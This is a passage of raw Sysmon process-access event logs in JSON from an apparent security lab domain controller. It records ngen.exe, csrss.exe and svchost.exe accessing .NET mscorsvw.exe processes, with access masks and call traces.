05:58:35.949","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001089D80D00}","TargetProcessId":"5040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6897,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.996\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001032DC0D00}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.996","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001032DC0D00}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6898,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.996\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001032DC0D00}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.996","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001032DC0D00}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6899,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:35.996\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001032DC0D00}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:35.996","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001032DC0D00}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6900,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.027\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-00104C1E0D00}\r\nTargetProcessId: 1260\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.027","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-00104C1E0D00}","TargetProcessId":"1260","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6901,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.027\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-00104C1E0D00}\r\nTargetProcessId: 1260\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.027","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-00104C1E0D00}","TargetProcessId":"1260","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6902,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.043\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010B7DF0D00}\r\nTargetProcessId: 1260\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.043","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010B7DF0D00}","TargetProcessId":"1260","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6903,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:36.074\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001061E30D00}\r\nTargetProcessId: 4664\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:36.074","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001061E30D00}","TargetProcessId":"4664","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERN